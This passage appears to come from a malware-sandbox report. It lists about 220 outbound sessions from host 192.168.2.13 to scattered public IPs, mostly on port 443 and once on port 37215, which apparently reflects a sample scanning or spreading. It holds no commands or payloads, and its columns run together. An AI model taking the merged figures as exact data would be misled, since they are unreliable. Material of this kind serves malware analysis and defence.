                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17891192.168.2.1340486207.234.130.237443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17892192.168.2.134361677.65.47.232443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17893192.168.2.134208637.222.140.232443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17894192.168.2.1351826165.202.124.66443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17895192.168.2.1341944148.7.185.219443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17896192.168.2.135386414.208.183.67443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17897192.168.2.1334424139.173.143.2443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17898192.168.2.134405274.196.120.203443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17899192.168.2.1348186177.190.203.55443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17900192.168.2.1355762187.98.184.75443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17901192.168.2.1341296146.60.89.109443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17902192.168.2.1360706169.3.51.73443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17903192.168.2.133886477.133.83.120443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17904192.168.2.1334112134.166.163.141443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17905192.168.2.13400989.51.188.219443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17906192.168.2.1349930109.202.228.219443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17907192.168.2.1358158192.148.233.252443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17908192.168.2.1333028117.162.183.251443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17909192.168.2.135953440.134.111.35443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17910192.168.2.1335340110.206.105.204443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17911192.168.2.135820894.174.72.147443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17912192.168.2.1360860198.243.102.151443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17913192.168.2.1337508222.46.0.217443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17914192.168.2.133660613.11.36.241443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17915192.168.2.135051263.195.143.123443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17916192.168.2.1360410112.21.190.16443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17917192.168.2.134237888.103.150.138443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17918192.168.2.134380048.188.232.133443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17919192.168.2.1341926183.86.171.174443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17920192.168.2.135538893.165.40.12443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17921192.168.2.1359744202.124.85.168443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17922192.168.2.135423431.82.38.191443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17923192.168.2.133703097.44.152.240443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17924192.168.2.1342292195.124.71.6443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17925192.168.2.135280677.54.153.58443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17926192.168.2.135592627.101.113.61443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17927192.168.2.134293873.148.24.50443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17928192.168.2.135738613.218.184.255443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17929192.168.2.1353468209.200.168.90443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17930192.168.2.133690235.229.121.166443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17931192.168.2.133394281.117.156.153443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17932192.168.2.135461057.251.165.247443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17933192.168.2.133973868.5.154.168443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17934192.168.2.134226048.129.83.211443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17935192.168.2.134397291.197.241.83443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17936192.168.2.1348390101.203.197.242443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17937192.168.2.1338966201.107.54.83443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17938192.168.2.1358696199.148.128.33443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17939192.168.2.1347362185.21.103.89443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17940192.168.2.1340210131.213.241.83443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17941192.168.2.1337176223.150.64.206443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17942192.168.2.133871054.192.15.91443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17943192.168.2.133518618.112.143.130443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17944192.168.2.136086298.200.79.199443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17945192.168.2.1346416143.31.36.212443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17946192.168.2.135771442.163.26.102443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17947192.168.2.134731695.77.7.241443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17948192.168.2.1359136112.28.100.167443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17949192.168.2.1346912211.58.199.51443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17950192.168.2.1350210193.3.178.206443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17951192.168.2.1359092195.0.254.27443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17952192.168.2.1360116137.82.71.23443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17953192.168.2.1347754223.35.142.230443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17954192.168.2.1347396146.22.132.45443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17955192.168.2.13409381.212.33.78443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17956192.168.2.1351588177.234.189.197443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17957192.168.2.1352128173.53.93.28443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17958192.168.2.1355758154.151.3.80443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17959192.168.2.133533452.196.97.136443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17960192.168.2.135158013.187.89.49443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17961192.168.2.134453882.0.193.37443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17962192.168.2.1342394162.16.11.110443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17963192.168.2.134029227.232.38.45443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17964192.168.2.1346124200.107.4.169443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17965192.168.2.1347606180.255.201.42443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17966192.168.2.1355420115.204.25.151443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17967192.168.2.134146285.136.56.35443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17968192.168.2.1340950164.121.210.154443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17969192.168.2.1355472139.167.52.55443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17970192.168.2.1354990148.89.30.145443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17971192.168.2.133897092.154.28.111443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17972192.168.2.1351048133.246.192.116443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17973192.168.2.1344172111.0.147.210443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17974192.168.2.133827696.138.172.146443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17975192.168.2.134664274.150.2.185443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17976192.168.2.1345714161.132.194.153443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17977192.168.2.1360008156.234.30.0443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17978192.168.2.134978097.218.228.234443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17979192.168.2.1336336119.11.82.150443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17980192.168.2.1356420154.82.215.137443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17981192.168.2.1337766131.243.172.250443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17982192.168.2.1354224153.42.214.152443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17983192.168.2.1333286193.232.243.129443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17984192.168.2.135797467.243.182.70443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17985192.168.2.134896084.32.94.186443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17986192.168.2.134746438.77.71.223443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17987192.168.2.1357896199.199.37.19443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17988192.168.2.1343056116.251.141.106443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17989192.168.2.1355072196.28.178.251443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17990192.168.2.134510296.123.19.185443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17991192.168.2.134593684.254.29.179443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17992192.168.2.1340134186.105.155.62443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17993192.168.2.135294247.77.6.46443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17994192.168.2.1352474141.240.108.39443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17995192.168.2.134879043.245.132.96443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17996192.168.2.134473218.169.93.206443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17997192.168.2.1341972132.126.171.139443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17998192.168.2.1335806213.115.150.82443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17999192.168.2.135021271.189.200.8443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18000192.168.2.1339900207.49.126.19443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18001192.168.2.1342722208.61.11.252443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18002192.168.2.1347232106.62.236.196443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18003192.168.2.1344180114.175.190.255443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18004192.168.2.1352886119.187.159.98443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18005192.168.2.1341654196.224.212.186443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18006192.168.2.1337762217.57.76.197443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18007192.168.2.135671892.59.33.37443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18008192.168.2.1353890136.183.167.45443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18009192.168.2.1356194105.192.215.128443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18010192.168.2.1352656148.252.68.80443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18011192.168.2.1359872179.236.80.143443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18012192.168.2.1338478197.175.244.203443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18013192.168.2.1341268123.128.132.178443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18014192.168.2.1340724102.188.11.114443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18015192.168.2.134821837.42.16.222443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18016192.168.2.1352082217.120.118.221443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18017192.168.2.133917881.91.81.106443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18018192.168.2.1354876136.90.201.147443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18019192.168.2.133837071.240.124.21443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18020192.168.2.135244892.6.1.41443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18021192.168.2.1340744168.92.133.193443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18022192.168.2.1357610126.100.252.196443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18023192.168.2.1352600129.163.43.142443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18024192.168.2.133738454.204.52.238443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18025192.168.2.134423072.223.178.137443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18026192.168.2.1336714122.110.61.79443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18027192.168.2.1351762132.140.192.115443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18028192.168.2.1350622185.143.81.222443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18029192.168.2.134900444.78.42.94443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18030192.168.2.1345930174.128.121.219443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18031192.168.2.1359836124.133.129.26443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18032192.168.2.133323042.90.249.161443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18033192.168.2.1340220182.24.254.161443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18034192.168.2.134481635.173.24.67443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18035192.168.2.1335270176.243.196.211443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18036192.168.2.135533071.83.151.94443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18037192.168.2.134872824.142.241.255443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18038192.168.2.1340760114.204.231.180443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18039192.168.2.1360546174.4.53.95443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18040192.168.2.1334144157.208.11.126443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18041192.168.2.135630820.91.138.53443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18042192.168.2.1338858188.189.181.162443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18043192.168.2.1351410140.187.113.29443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18044192.168.2.133482674.167.58.164443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18045192.168.2.133683069.165.75.135443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18046192.168.2.1338024200.178.101.152443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18047192.168.2.1333550147.53.177.227443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18048192.168.2.1348120146.127.19.215443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18049192.168.2.1338360110.206.17.194443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18050192.168.2.1339480195.148.215.84443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18051192.168.2.133462667.248.29.84443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18052192.168.2.135869835.252.30.67443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18053192.168.2.133460423.146.246.135443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18054192.168.2.135470219.86.203.176443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18055192.168.2.134029237.216.168.59443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18056192.168.2.1348486200.111.46.59443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18057192.168.2.1345488130.57.108.72443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18058192.168.2.135204044.174.79.126443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18059192.168.2.135401241.134.179.37443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18060192.168.2.135824670.170.63.26443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18061192.168.2.1336192163.224.65.39443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18062192.168.2.134544680.79.161.240443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18063192.168.2.1337376205.10.161.189443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18064192.168.2.1346572168.235.8.159443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18065192.168.2.133306018.11.112.228443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18066192.168.2.135505648.236.107.24443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18067192.168.2.133949894.52.86.185443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18068192.168.2.1357882187.79.135.121443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18069192.168.2.133753014.24.3.112443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18070192.168.2.135576618.82.166.95443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18071192.168.2.135047282.251.95.84443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18072192.168.2.1348908208.43.40.138443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18073192.168.2.133739069.84.233.166443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18074192.168.2.1335724125.108.205.225443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18075192.168.2.1346364152.201.161.14443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18076192.168.2.1337310173.229.174.56443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18077192.168.2.1334970130.76.93.165443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18078192.168.2.1354684204.224.5.242443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18079192.168.2.1357732200.9.225.205443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18080192.168.2.133656014.238.44.218443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18081192.168.2.1341834216.223.80.223443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18082192.168.2.135319262.163.14.29443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18083192.168.2.13377224.159.209.156443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18084192.168.2.1333844160.224.134.139443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18085192.168.2.1353824150.217.109.86443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18086192.168.2.134671631.21.221.254443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18087192.168.2.135762214.70.182.112443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18088192.168.2.134297896.246.229.39443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18089192.168.2.1334360182.61.18.15443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18090192.168.2.1351706186.145.243.98443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18091192.168.2.133983819.146.116.46443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18092192.168.2.135131075.206.63.190443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18093192.168.2.1355884212.59.168.199443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18094192.168.2.133301883.29.172.52443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18095192.168.2.133483295.13.243.42443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18096192.168.2.1359898131.21.128.252443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18097192.168.2.1336660144.15.32.233443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18098192.168.2.134507896.187.17.51443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18099192.168.2.1342704135.128.32.140443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18100192.168.2.1345576204.174.196.120443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18101192.168.2.1353278171.217.19.113443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18102192.168.2.1348782115.70.31.219443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18103192.168.2.134552481.157.137.151443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18104192.168.2.135291634.112.254.8443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18105192.168.2.134359450.90.32.115443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18106192.168.2.1335412102.158.221.179443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18107192.168.2.1342994107.61.200.119443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18108192.168.2.1356842159.204.121.139443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18109192.168.2.1341364138.66.216.172443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18110192.168.2.1351312114.3.236.157443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18111192.168.2.1358876160.181.184.10837215
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
